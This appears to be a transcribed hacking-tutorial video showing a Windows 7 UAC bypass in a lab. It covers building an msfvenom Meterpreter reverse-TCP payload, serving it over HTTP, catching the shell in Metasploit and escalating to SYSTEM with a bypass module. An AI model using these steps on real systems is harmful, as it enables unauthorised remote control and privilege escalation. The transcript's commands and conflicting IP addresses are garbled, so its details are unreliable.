Hello everyone. So today we are back again with another video. So today's topic is how to bypass UAC. UAC stands for User Account Control. Okay, that is a Windows system. So to know UAC, let's jump to Windows 7. Okay, so basically see that this is a Windows system. Now, what is the user account control? Let's see. If I want to what I have a Wattpad. Now if I want to say this is Wattpad, I opened it. Now let's say if I want to access the Wattpad as an administrator, see there is a user account control. Okay, you can see that it is a user account control, means a security created by the Microsoft for their system, so that anyone without any super user or administrative permission can't access anything. So now you can ask why we need this user account control. Basically, this UAC or user account, we have to bypass it to gain the system access. Now what is the system access? Let's see by practical. Now first of all, let's jump back to our Kali machine. Okay. Now let's say we create a payload. Okay. Let's say I am creating a payload for my Windows system. Okay. Let's say venum e for payload. Then it will be Windows Meterpreter. Okay. A reverse TCP connection. The L host will be my system, that is 192.168.8.1. And I will choose the listening port, that is 4444 on the by default. And the format will be exe, and the output will be, let's say, virus.exe. It's creating. Let's wait for some time so it can complete the creation process. Okay, so if I hit the ls, see there is a virus.exe file is created here. Now I want to send this to my Windows system, so I am just creating a simple HTTP server from here. Now in Windows, if I go to my URL and I type the IP address, okay, and I type the IP address, that is http://192.168.13.1, and I got the listing, and from here let's download the virus.exe. I am clicking on save. Let's go to desktop and save this. So it's done. Now let's back to our Kali and open the reproduction. Okay. Now what's happening here? Basically I created or I generated a reverse shell to get a connection. But what will happen? This will only get you a normal level user access. Let's see. Let's start the MSF console from here. Let's say I'm typing use multi handler. Now let's set lhost 92.168.8.133, set L port on 4444, and we have to set our payload on Windows meter greater let's wait it's going yep reverse TCP. Now let's hit run. So it started. Now if we run this, double click and run, and we came back to our Kali, see, we get a access. We get a access to our system. How we can check it by this info. See, our Windows 7, it's showing us. Okay. Now that's good, no problem. Now, okay. Now, if I type here about shell, see, it is showing us that C users Megatron desktop this, and if I type who am I, it is showing me the username, but it is not the highest user here. It also has some limited access. Now we have to go to the highest user, that is system32. How? For that, because I show you before that Microsoft has a user account control, we have to basically bypass that. Now how we can bypass it? Let's first we exit from this shell mode, and now we are in our metapleter mode. Now I will background this session. So the session was background. Now I will search for bypass USA. See, there are lots of things here. Now we have to look for something like this, that escalate USC protection bypass. So what we will do, we will use this. Let's say use 2. Now it's configured. Now set session, we will select the session that is already running, 1, enter, and we will type exploit. See, it's showing us that session 2 was opened. Now how we can check? Let's back to the shell section, and now you can see it is showing us the Windows System 32, and if we type as who am I, see, now you can see that see Windows System 32. Okay, so you got that point, how easily we can bypass the UAC using the MSF console only. First we got a normal shell, then from there we got a normal user, that is our C users Megatron desktop. Now from there we got to the system32, which is the administrative access, right? I hope this short video you enjoyed, you learned a lot of things. For more you can check our websites and all. Thank you everyone.